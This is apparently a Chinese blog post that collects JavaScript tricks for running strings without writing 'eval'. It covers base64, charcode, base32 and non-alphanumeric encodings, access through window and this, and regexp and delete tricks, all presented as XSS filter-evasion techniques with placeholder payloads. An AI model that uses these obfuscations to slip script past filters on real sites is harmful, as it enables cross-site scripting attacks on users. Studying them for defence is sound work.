A-A+

xss 之无需 eval (收集不同方法来执行字符串，无需显式调用eval()函数)

2017年06月21日 11:15 汪洋大海暂无评论共183字 (阅读3,123 views次)

/***********************/
/* Encoded eval string */
/***********************/
<script>
var eval_b64 = 'ZXZhbA==';
var eval_charcode = 'String.fromCharCode(101,118,97,108)';
var eval_base32 = '490837..toString(1<<5)';
var eval_non_alpha1 = '(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]';
var eval_non_alpha2 = '(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]])';
</script>
 
/*********************/
/* Through functions */
/*********************/
<script>
var fn=window[atob('ZXZhbA==')];
fn(/*code to eval()/*);
</script>
 
<script>
var fn=window[String.fromCharCode(101,118,97,108)];
fn(/*code to eval()/*);
</script>
 
<script>
var fn=window[490837..toString(1<<5)];
fn(/*code to eval()/*);
</script>
 
/**********************************/
/* Straight through window object */
/**********************************/
<script>
window[atob('ZXZhbA==')](/*code to eval()*/)
</script>
 
<script>
window[String.fromCharCode(101,118,97,108)](/*code to eval()*/)
</script>
 
<script>
window[490837..toString(1<<5)](/*code to eval()*/)
</script>
 
<script>
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
 
<script>
window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
 
/*************************/
/* Straight through this */
/*************************/
<script>
this[atob('ZXZhbA==')](/*code to eval()*/)
</script>
 
<script>
this[String.fromCharCode(101,118,97,108)](/*code to eval()*/)
</script>
 
<script>
this[490837..toString(1<<5)](/*code to eval()*/)
</script>
 
<script>
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
 
<script>
this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */)
</script>
 
/****************/
/* regexp based */
/****************/
<script>
'e1v2a3l'.replace(/(.).(.).(.).(.)/, function(match,$1,$2,$3,$4) { this[$1+$2+$3+$4](/* code to eval() */); })
</script>
 
/*********************************/
/* Other ways to execute strings */
/*********************************/
<script>
delete /* code to execute */
throw~delete~typeof~/* code to execute */
delete[a=/* function */]/delete a(/* params */)
var a = (new function(/* code to execute */))();
</script>

/***********************/ /* Encoded eval string */ /***********************/ <script> var eval_b64 = 'ZXZhbA=='; var eval_charcode = 'String.fromCharCode(101,118,97,108)'; var eval_base32 = '490837..toString(1<<5)'; var eval_non_alpha1 = '(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]'; var eval_non_alpha2 = '(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]])'; </script> /*********************/ /* Through functions */ /*********************/ <script> var fn=window[atob('ZXZhbA==')]; fn(/*code to eval()/*); </script> <script> var fn=window[String.fromCharCode(101,118,97,108)]; fn(/*code to eval()/*); </script> <script> var fn=window[490837..toString(1<<5)]; fn(/*code to eval()/*); </script> /**********************************/ /* Straight through window object */ /**********************************/ <script> window[atob('ZXZhbA==')](/*code to eval()*/) </script> <script> window[String.fromCharCode(101,118,97,108)](/*code to eval()*/) </script> <script> window[490837..toString(1<<5)](/*code to eval()*/) </script> <script> window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */) </script> <script> window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */) </script> /*************************/ /* Straight through this */ /*************************/ <script> this[atob('ZXZhbA==')](/*code to eval()*/) </script> <script> this[String.fromCharCode(101,118,97,108)](/*code to eval()*/) </script> <script> this[490837..toString(1<<5)](/*code to eval()*/) </script> <script> this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](/* code to eval() */) </script> <script> this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]](/* code to eval() */) </script> /****************/ /* regexp based */ /****************/ <script> 'e1v2a3l'.replace(/(.).(.).(.).(.)/, function(match,$1,$2,$3,$4) { this[$1+$2+$3+$4](/* code to eval() */); }) </script> /*********************************/ /* Other ways to execute strings */ /*********************************/ <script> delete /* code to execute */ throw~delete~typeof~/* code to execute */ delete[a=/* function */]/delete a(/* params */) var a = (new function(/* code to execute */))(); </script>

有缘千里来相会

蜗居

窄小蜗居，虽非富贵王侯宅；清闲螺径，也异寻常百姓家。 woj → 蜗居

xss 之无需 eval (收集不同方法来执行字符串，无需显式调用eval()函数)

给我留言取消回复

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

给我留言取消回复